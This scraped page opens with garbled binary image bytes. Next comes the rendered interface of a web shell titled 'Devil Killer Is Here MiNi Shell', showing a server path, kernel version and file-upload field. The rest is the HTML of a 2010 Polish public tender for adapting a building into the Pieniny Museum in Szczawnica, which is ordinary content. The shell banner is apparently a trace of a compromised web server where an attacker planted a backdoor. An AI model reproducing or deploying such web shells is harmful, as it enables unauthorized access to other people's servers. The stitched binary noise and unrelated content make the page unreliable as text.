JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/280686-N-2010.html

<p class="kh_header"><b>Nowy Sącz: Adaptacja budynku na potrzeby siedziby Muzeum Pienińskiego im. Szalaya w Szczawnicy zlokalizowanych w gminie Szczawnica dz. Szlachtowa.</b><br>
<b>Numer ogłoszenia: 280686 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Okręgowe w Nowym Sączu , ul. Lwowska 3, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4437708, faks 018 4437865.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury Województwa Małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku na potrzeby siedziby Muzeum Pienińskiego im. Szalaya w Szczawnicy zlokalizowanych w gminie Szczawnica dz. Szlachtowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie w systemie generalnego wykonawstwa- robót budowlanych pn.:  Adaptacja budynku na potrzeby siedziby Muzeum Pienińskiego im. Szalaya w Szczawnicy zlokalizowanych w gminie Szczawnica dz. Szlachtowa, zwanego dalej także robotą- zadaniem- lub  inwestycją.
Realizowane zadanie inwestycyjne obejmuje:
1. 	adaptację istniejącego, nie użytkowanego budynku na obiekt mieszczący recepcję publiczności: info-szatnia-kasa, sklepik muzealny, zaplecze higieniczno-sanitarne ogólnodostępne, sale wystaw stałych, pomieszczenia administracji muzeum, pracownie merytoryczne, magazyn zbiorów etnograficznych, bibliotekę i archiwum specjalistyczne, sale konferencyjną, muzealne pokoje gościnne z węzłem sanitarnym, pomieszczenia socjalne i sanitarne dla pracowników, pomieszczenia techniczne - w tym kotłownię (pow. użytkowa 640,85 m2, kubatura 3200,00 m3),
Wyburzenia i nowe elementy konstrukcyjne:
Zakłada się rozbiórkę obecnych schodów od strony zachodniej i wykonanie nowych. Zakłada się wyburzenie części ścian wewnętrznych - wg rysunków koncepcyjnych. W miejsce elementów wyburzonych wprowadzić należy podciągi po wyliczeniach konstrukcyjnych. Podciągi: belki dwuteowe, słupy: HEB, zabezpieczenie przeciwpożarowe RIDURIT lub REGIPS (preferowane rozwiązanie tańsze, dopuszczone w wyniku uzgodnień na etapie projektowania). Fundamenty pod słupy: żelbetowe, do 1,2 m, posadowione w osi przeznaczonych do wyburzenia ścian. Wymóg zabezpieczenia konstrukcji stalowej we wnętrzu przeciwpożarowo do klasy odporności ogniowej R60.
Nowe elementy budowlane:
Do wykonania podjazd dla niepełnosprawnych i wejście do budynku (schody) - wg rysunków koncepcyjnych, od strony zachodniej. Rampa zewnętrzna o nachyleniu 8% umożliwiająca wjazd osoby na wózku inwalidzkim.
Ocieplenie i wykończenie ścian nośnych:
Od zewnątrz, po demontażu warstw tynku i supremy, do położenia: płyta OSB 12 mm, styropian 8 cm, tynk gładki cienkowarstwowy 3-4 mm - warstwy nie mogą przekroczyć o więcej niż 3 cm grubości istniejących  warstw, aby nie zaburzyć  proporcji bryły budynku do belek i połaci dachowych oraz wnęk okiennych; po odkryciu drewna i po stwierdzeniu możliwości rezygnacji z płyty OSB należy odpowiednio pogrubić izolację termiczną. Zakłada się wymianę części (50%) belki podwalinowej. Nieimpregnowane elementy drewniane należy odpowiednio zabezpieczyć przed ogniem, grzybami pleśniowymi i domowymi oraz owadami (np. Fobos M4 lub równoważny środek). Zakłada się, zgodnie z wytycznymi inwestora, pozostawienie warstw wewnętrznych: suprema, tynk. Dopuszcza się w trakcie prac projektowych i budowlanych alternatywne rozwiązania: 
-	rozbiórkę warstw wewnętrznych do drewna, położenie nowych warstw: pustka powietrzna, folia paroprzepuszczalna, płyta g-k.
-	tynk na siatce.
-	Alternatywne rozwiązania uzależnione od wykończenia warstw zewnętrznych. 
-	Stolarka i ślusarka:
-	Wiatrołap w głównym wejściu wykonać w konstrukcji aluminiowej szklonej szkłem bezpiecznym. Przewidziana całkowita wymiana stolarki okiennej i drzwiowej. Okna drewniane, skrzynkowe, kwatery powtarzające istniejące podziały. Zewnętrzne skrzydła okien szklone szkłem bezpiecznym, wewnętrzne hermetyczne, zespolone, k=1,1. Kraty w oknach parteru - zgodnie z opisanymi wyżej wymogami. Kolorystyka stolarki i ślusarki - wg kolorystyki RAL, do ustalenia na etapie projektu wykonawczego. 
Drzwi: 
-	zewnętrzne: obicie drewniane na konstrukcji stalowej, ocieplone, pełne,
-	wewnętrzne w ciągach komunikacyjnych: drewniane, szklone do dwie trzecie wysokości szkłem bezpiecznym,
-	do pomieszczeń biurowych, pracowni, sali konferencyjnej: drewniane, pełne,
-	do magazynu zbiorów, biblioteki i archiwum: blacha na konstrukcji stalowej malowana wg kolorystyki RAL, antywłamaniowe,
-	w pomieszczeniach higieniczno - sanitarnych, socjalnych, pomocniczych: typowe, systemowe.
-	Balustrady: na klatce schodowej oraz na podjeździe dla niepełnosprawnych stalowe, malowane proszkowo. Balustrady wewnętrzne wys. 110 cm.
Wykończenia ścian i powierzchni płaskich:
Nie zakłada się zbijania tynku z istniejących stropów z wyjątkiem miejsc, w których będzie montowana konstrukcja wsporcza stalowa podpierająca strop.  W przypadku pozostawienia supremy istniejący tynk do wyrównania po założeniu tras kablowych. Alternatywne rozwiązania: płyty g-k. na podkonstrukcji, tynk na siatce.
Stropy:
- w pomieszczeniach parteru: sufit podwieszany: płyta g-k.,
- w pomieszczeniach piętra: płyta g-k.,
- w pomieszczeniach higieniczno-sanitarnych: płyta g-k wodoodporna.
Posadzki: 
- na ekspozycji: deski na legarach wg zaleceń inwestora; alternatywa: okładzina kamienna (np. jura gelb) lub, za zgodą Inwestora, wykładziny obiektowe wg standardu - standard wykładzin obiektowych zbliżony do oferowanych przez Ampel, Lentex, kolorystyka do ustalenia na etapie projektu wykonawczego, 
- foyer, komunikacja: wykładzina obiektowa - standard wykładzin obiektowych zbliżony do oferowanych przez Ampel, Lentex, kolorystyka do ustalenia na etapie projektu wykonawczego,
- pomieszczenia higieniczno - sanitarne: posadzki ceramiczne, standard ceramiki zbliżony do oferowanej przez Opoczno, Paradyż, Cersanit, kolorystyka do ustalenia na etapie projektu wykonawczego,
- pokoje biurowe, pracownie merytoryczne, magazyn zbiorów, biblioteka i archiwum, pokoje gościnne: wykładzina obiektowa, kolorystyka do ustalenia na etapie projektu wykonawczego.
Posadzki kładzione na warstwach: chudy beton 10 cm, folia, styropian twardy 5 cm, wylewka betonowa zbrojona włóknem rozproszonym 5 cm.
Wejście do budynku i podjazd dla niepełnosprawnych: gres mrozoodporny antypoślizgowy. 
Ściany drewniane: j.w. opisano.
Ściany murowe:
- tynk cementowo - wapienny, malowanie farbami emulsyjnymi, kolorystyka - RAL: do ustalenia na etapie projektu wykonawczego,
- pomieszczenia higieniczno - sanitarne: okładzina ceramiczna, kolorystyka do ustalenia na etapie projektu wykonawczego.
Ściany g-k. na podkonstrukcji: malowanie j.w. lub ceramika j.w.
Klatki schodowe:
- ściany i stropy: tynk cementowo-wapienny, malowanie, kolorystyka do ustalenia na etapie projektu wykonawczego,
-posadzka: gres.

2. 	remont dachu strażnicy, wykonanie instalacji, roboty budowlano - wykończeniowe,
Przewidziana wymiana pokrycia połaci dachowych i orynnowania. Do położenia blachodachówka gontopodobna z blachy stalowej z posypką z naturalnego kruszywa.  Standard: zbliżony do oferowanych przez Blachotrapez (Metro Shake), Decra (Stratos). Kolor: grafit. Rynny wiszące, systemowe, PCV, w kolorze blachodachówki. Odwodnienie: w I etapie na teren (docelowo - do planowanej kanalizacji). Do wymiany łaty i kontrłaty. Wszystkie stare i nowe elementy drewniane należy odpowiednio zabezpieczyć przed ogniem, grzybami pleśniowymi i domowymi oraz owadami (np. Fobos M4 lub równoważny środek). Ocieplenie połaci dachowych: wełna mineralna grubości 20 cm + warstwy folii paro i wiatroprzepuszczalnej + płyta GKF na podkonstrukcji. Do wykonania 2 wyłazy dachowe.
Kominy
Do wykonania nowe kanały wentylacyjne i komin spalinowy z kotłowni. Kanał spalinowy z kotłowni z rury stalowej nierdzewnej kwaso- i żaroodpornej obmurowany cegłą pełną 12 cm kl.150. Elementy wyniesione ponad dach - z cegły klinkierowej.

3. 	rozbudowę i adaptację dawnego garażu na: pomieszczenie ochrony, kawiarnię muzealną, ogólnodostępne węzły sanitarne będące zapleczem dla imprez plenerowych, zaplecze magazynowe i pomieszczenia techniczne (pow. użytkowa 309,81 m2, kubatura 1670,00 m3)
Zachowana zostanie bryła i sylweta obiektu, nie wpisanego wprawdzie do rejestru zabytków, ale o dużym potencjale historycznym i kulturowym. Podniesiony zostanie standard użytkowy z wymianą elementów wykończeniowych. Wnętrze dostosowane do pełnienia nowych funkcji: pomieszczenia dozoru całodobowego Muzeum, kawiarni muzealnej, pomieszczeń gospodarczych, zaplecza amfiteatru, whs dla amfiteatru i imprez plenerowych; nieznacznie przekształcony układ wnętrza. Rozbudowa budynku: powiększenie powierzchni zabudowy i użytkowej o prawie 100%. Część dobudowana - bryła będąca nawiązaniem do istniejącego budynku (kontynuacja - powtórzenie formy), kryta osobnym dwuspadowym dachem o równoległym układzie kalenicowym; poniżej zbiegu okapów obu dachów - kosz dachowy. Elewacje części istniejącej powtarzające pierwotny układ słupów i lizen.
Wyburzenia i nowe elementy konstrukcyjne:
Rozbudowa budynku: powiększenie powierzchni zabudowy i użytkowej o prawie 100%. Część dobudowana - bryła będą nawiązaniem do istniejącego budynku, kryta osobnym dwuspadowym dachem o równoległym układzie kalenicowym. Część dobudowana: ściana zewnętrzna nośna z dociepleniem (pustaki ceramiczne, np. Porotherm 30 Profi + styropian 8 cm), murowana na cienką spoinę. Ściany nośne wewnętrzne murowe lub podciąg żelbetowy wsparty na żelbetowych słupach - w osi budynku istniejącego. Fundamenty żelbetowe zagłębione poniżej poziomu przemarzania (1,2 m).
Ściany wewnętrzne:
Ściany działowe wydzielające whs. i komunikację: murowe z bloczków ceramicznych np. Porotherm 11,5 P+W.
Ocieplenie i wykończenie ścian fundamentowych, nośnych, stropów, połaci dachowych i podłóg:
Strefa cokołowa - ściana trójwarstwowa, ocieplona XPS i oblicowana łupkiem tatrzańskim, spoinowanym. Oblicowanie kotwić typowymi kotwami (zalecane: nierdzewne o 4,5mm w ilości min. 4 kotwy na 1 m2).
Ściany zewnętrzne: od zewnątrz styropian 8 cm + tynk cienkowarstwowy gładki. W części adaptowanej nieznacznie wysunąć poza lico ściany lizeny - obecnie zaznaczone wykładzina kamienną (do przykrycia). Dopuszczalne nieznaczne przesunięcie w stosunku do siebie lica ścian części adaptowanej i dobudowanej w celu zaznaczenia różnicy w chronologii. Docieplenie podłogi: warstwy posadzkowe do wykonania: chudy beton 10 cm, folia, styropian twardy 5 cm, wylewka betonowa 5 cm, warstwy wykończeniowe. Wykończenie stropu: folia, styropian 8-10 cm, wylewka betonowa 5 cm. Docieplenie połaci dachowych: folia dachowa, wełna mineralna 20 cm, 2 x płyta GKBF. Strych planowany jako pomieszczenia techniczne i podręczne magazyny z dostępem poprzez schody zewnętrzne oraz schody systemowe składane strychowe.
Dach:
Przewidziana wymiana pokrycia połaci dachowych i orynnowania.  Do położenia dachówka ceramiczna zakładkowa - nawiązująca do istniejącej. Rynny wiszące, systemowe, PCV. Odwodnienie:  na teren. Do wymiany łaty i kontrłaty.  Wszystkie stare i nowe elementy drewniane należy odpowiednio zabezpieczyć przed ogniem, grzybami pleśniowymi i domowymi oraz owadami (np. Fobos M4 lub równoważny środek). Ocieplenie połaci dachowych: j.w. Do wykonania 2 wyłazy dachowe.
Kominy Do wykonania nowe kanały wentylacyjne. Elementy wyniesione ponad dach - z cegły. 
Stolarka i ślusarka:
Przewidziana całkowita wymiana stolarki okiennej i drzwiowej. Okna drewniane, szyby zespolone k=1,1. Drzwi: 
- zewnętrzne: drewniane, pełne, za wyjątkiem kawiarni gdzie zakłada się przeszklenie do 23 - wysokości (szkło bezpieczne),
- wewnętrzne: drewniane, pełne,
- w pomieszczeniach higieniczno - sanitarnych, socjalnych, pomocniczych: typowe, systemowe.
Wykończenia ścian i powierzchni płaskich:
Do wykonania na całej powierzchni ścian i sufitu tynki cementowo-wapienne + malowanie ścian i sufitów. Ściany pomieszczeń higieniczno - sanitarnych: okładzina ceramiczna, powyżej tynki.
Posadzki: 
- portiernia, kawiarnia: posadzka ceramiczna,
- zaplecze: posadzka betonowa malowana wodną dyspersją żywicy epoksydowej,
- pomieszczenia higieniczno - sanitarne: posadzki ceramiczne, standard ceramiki zbliżony do oferowanej przez Opoczno, Paradyż, Cersanit.


4. 	budowę amfiteatru - otwartego obiektu terenowego z widownią i estradą na imprezy etnograficzno-folklorystyczne - jako formy wzbogacającej ofertę kulturalną muzeum (pow. zabudowy 707,30 m2.).
Scena: obiekt drewniany, konstrukcja szkieletowa, na fundamentach betonowych. Wejścia z dwóch stron: betonowe schody o szerokości 140 cm, obłożone gresem mrozoodpornym antypoślizgowym, z obu stron balustrady drewniane. Rozdzielnica, gniazda wtykowe 230 (4 punkty na słupach) i 400 V (1 punkt), instalacja oświetleniowa (4 punkty). Zadaszona, kryta blachodachówką gontopodobną - jak w budynku strażnicy. Widownia: siedziska drewniane (ławki), bez oparć. Niezadaszona. Ławki w trzech rzędach ustawione w spadku. Niezbędne odpowiednie wyprofilowanie terenu. W przejściach oraz na dojściach betonowe schody. Lokalizacja i parametry techniczne wg. dokumentacji. Lokalizacja w miejscu dawnej stacji paliw wymaga rozbiórki stacji i wymiany gruntu (szacunkowa ilość gruntu do wymiany - dokumentacja).

5. 	modernizację infrastruktury technicznej (instalacje wewnętrzne i zewnętrzne, kotłownia olejowa,  linia kablowa, kanalizacja wielofunkcyjna, zbiornik p.poż)
Szczegółowy opis w specyfikacji technicznej i dokumentacjach branżowych.


6. 	rozbiórkę obiektów w celu uwolnienia terenu pod inwestycję
Realizacja inwestycji wymaga rozbiórek: stacji paliw, zbiorników stacji paliw, magazynu paliw, masztu antenowego.  Do rozbiórki wytypowano także istniejące drogi i place o nawierzchni betonowej i bitumicznej. Rozbiórka powiązana będzie z budową nowych dróg. Rozbiórki elementów budowlanych strażnicy - opisane w zakresie prac przy budynku.

7. 	zagospodarowanie terenu nowej siedziby Muzeum. 
Wycinki, nasadzenia i zasiewy:
Wycinki drzew i krzewów: 
- na stoku w miejscu amfiteatru - w zakresie niezbędnym,
Niezbędne nasadzenia drzew wokół istniejącej i projektowanej oczyszczalni ścieków. 
Drogi i dojścia:
Zachowane zostanie istniejące włączenie do drogi powiatowej dla części północnej. 
Do wykonania nowe drogi wewnętrzne oraz parkingi i dojścia. Do wykonania nowa droga pożarowa.
Podbudowa dla dróg kołowych - dojazdy do parkingów dla publiczności, drogi dostawcze i pożarowe: tłuczeń-kamień łamany 30 cm, piasek + cement, kostka wibroprasowana. Nawierzchnia parkingów: kostka wibroprasowana (50%) i zielony parking (50%). Odwodnienie: powierzchniowe ze spadkiem poprzecznym jednostronnym 1%.
Oczyszczalnia ścieków:
Niezbędna dla funkcjonowania Muzeum  do czasu podłączenia do kanalizacji gminnej, do wykonania w I etapie inwestycji. Lokalizacja w cz. południowej poniżej obecnie istniejącej oczyszczalni dla budynków mieszkalnych tak, aby uniknąć budowy przepompowni. Przewidziano oczyszczalnię biologiczno-mechaniczną dla 20 osób stale przebywających typu EKOPOL standard. Zbiornik szczelny, zagłębiony w teren.
Wykopy i nasypy:
Realizacja projektu wymaga zmiany niwelety terenu . Ilość przyjętych dla potrzeb niniejszego opracowania wykopów i nasypów podana została w dokumentacji


2.	Szczegółowy zakres - opis przedmiotu zamówienia określają:
a)  Projekt budowlano wykonawczy, zwany dalej -dokumentacją- stanowiącą załącznik nr 5 do specyfikacji .
b) specyfikacja techniczna wykonania i odbioru robót budowlanych, stanowiąca załącznik nr 6 do specyfikacji 
c) przedmiary robót stanowiące załącznik nr 7 do specyfikacji.
3.	Roboty wykonywane będą na podstawie dokumentacji projektowej, zatwierdzonej pozwoleniem na budowę : Decyzja nr: 27010 z dnia 16 kwietnia 2010 roku, znak: BA-7351-0151-Sz10.
4.	Przedmiotem zamówienie jest nadto sporządzenie i wydanie Zamawiającemu świadectwa charakterystyki energetycznego zgodnie z przepisami Prawa Budowlanego oraz przepisów wykonawczych w tym rozporządzenia Ministra Infrastruktury z dnia 6 listopada 2008 r. w sprawie metodologii obliczania charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej ( Dz.U. 2012008 poz. 1240). 
5.	Symbol Wspólnego Słownika Zamówień (CPV) - główny przedmiot: 45 00.00.00.- 7  - Roboty budowlane, kod CPV: 45 21. 23.00.- 9  - Roboty budowlane w zakresie budowy  artystycznych i kulturalnych obiektów budowlanych. 
6.	Podane w dokumentacji nazwy materiałów, urządzeń i sprzętu mają znaczenie przykładowe i Wykonawca może stosować materiały, urządzenia i sprzęt równoważne, dopuszczone do stosowania na obszarze RP. Przez materiały lub urządzenia równoważne Zamawiający rozumie materiały lub urządzenia posiadające równorzędne lub wyższe parametry techniczne i jakościowe jak wskazane przez Zamawiającego.
7.	Roboty należy wykonywać zgodnie z obowiązującymi przepisami budowlanymi,  obowiązującymi normami oraz zasadami wiedzy technicznej, w sposób nie zagrażający bezpieczeństwu ludzi i mienia.
8.	Wykonawca zobowiązuje się wykonać przedmiot umowy z materiałów, sprzętu i urządzeń własnych.  
9.	W celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający zaleca dokonanie przez wykonawcę (na własny koszt, ryzyko i odpowiedzialność) wizji lokalnej w terenie budowy oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty.
10.	Miejsce wykonania zamówienia:  Polska, woj. małopolskie, miasto Szczawnica - Obr. Szlachtowa.
11.	Zamawiający dopuszcza wykonanie przedmiotowych robót budowlanych przy posłużeniu się podwykonawcami, nie określa która część zamówienia nie może być im powierzona.  
12.	Jeżeli Wykonawca zgodnie z  ust. 6 powierzy część robót podwykonawcom, to Zamawiający żąda wskazania przez wykonawcę w ofercie te części zamówienia, której wykonanie powierzy podwykonawcom. Szczegółowe obowiązki wykonawcy i podwykonawcy w stosunku do zamawiającego określa projekt umowy z wykonawcą stanowiący załącznik do umowy. 
13.	Zamawiający wymaga 3 letniego okresu odpowiedzialności Wykonawcy za wady rękojmi i 3 letniego okresu gwarancji jakości licząc od dnia podpisania protokołu odbioru końcowego przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.23.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 40.000,00 PLN (słownie złotych: czterdzieści tysięcy) przed upływem terminu składania ofert lecz  nie później niż do dnia 20.09.2010 r. do  godz.  13 00.
2.	Wadium może być wniesione: 
a) w pieniądzu - wyłącznie przelewem na rachunek bankowy wskazany poniżej,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)
3. Wykonawca którego oferta nie będzie zabezpieczona jedną z wymienionych form wadium, zostanie wykluczony, zaś ofertę uznaje się za odrzuconą.
4. Wadium w pieniądzu:
a) Wadium w formie przelewu należy wpłacić na konto Zamawiającego - Muzeum Okręgowe Nowy Sącz, Kredyt Bank S.A. oddział Nowy Sącz Nr 40150015591215500088640000 z zaznaczeniem;  Adaptacja budynku na potrzeby siedziby Muzeum Pienińskiego im. Szalaya w Szczawnicy
b) Za datę wniesienia wadium uznaje się datę zaksięgowania wadium na rachunku Zamawiającego. 
c) Zamawiający określa porządkowy wymóg załączenia do oferty kserokopii przelewu;
d) Zamawiający dokona sprawdzenia czasu wpływu wadium na swoje konto .
5. Wadium w pozostałych formach 
a) oryginał; należy złożyć w podanym w ust. 1 terminie, w siedzibie Zamawiającego - Muzeum Okręgowe Nowy Sącz, 33-300 Nowy Sącz, ul Lwowska 3 pok. Dział Księgowości, w godz. otwarcia  7.30- 15.30 , natomiast kserokopię należy (wymóg porządkowy) załączyć do oferty.  
b) wadium składane w tej formie musi mieć datę początkową ważności równą co najmniej terminowi złożenia oferty, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą. W razie zawieszenia postępowania lub przedłużenia terminu składania ofert, końcowy termin ważności wadium, o którym mowa w ust. 2 lit. b, c ,d , e albo zostanie przedłużony przez wykonawcę, albo wniesie on nowe wadium na przedłużony okres.
6. Zamawiający zastrzega, że w razie składania gwarancji lub poręczeń jako wadium; 
a) gwarancje oraz poręczenia powinny być wystawione na  Muzeum Okręgowe Nowy Sącz, w treści tych gwarancji oraz poręczeń nie mogą być żadne postanowienia ograniczające prawo Zamawiającego do ich realizacji. 
b) gwarancje oraz poręczenia muszą określać bezwarunkowe prawo Zamawiającego do ich realizacji.
c) gwarancje oraz poręczenia, w których ograniczono prawa Zamawiającego, lub w których uzależniono realizację od spełnienia jakichkolwiek warunków przez Zamawiającego do wykonania których Zamawiający nie wyraził zgody na piśmie, uznane zostaną jako nie spełniające warunków.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykonanie co najmniej dwóch zamówień dotyczącego robót budowlanych związanych z budową, przebudową lub dobudową obiektów kubaturowych  użyteczności publicznej o wartości nie mniejszej niż 3 000 000 zł. brutto dla każdego z tych zamówień;
b)	wykonanie co najmniej jednego zamówienia dotyczącego robót budowlanych związanych z budową, przebudową lub remontem  nawierzchni z  kostki betonowej o wartości nie mniejszej niż  500 000 zł. brutto</p>
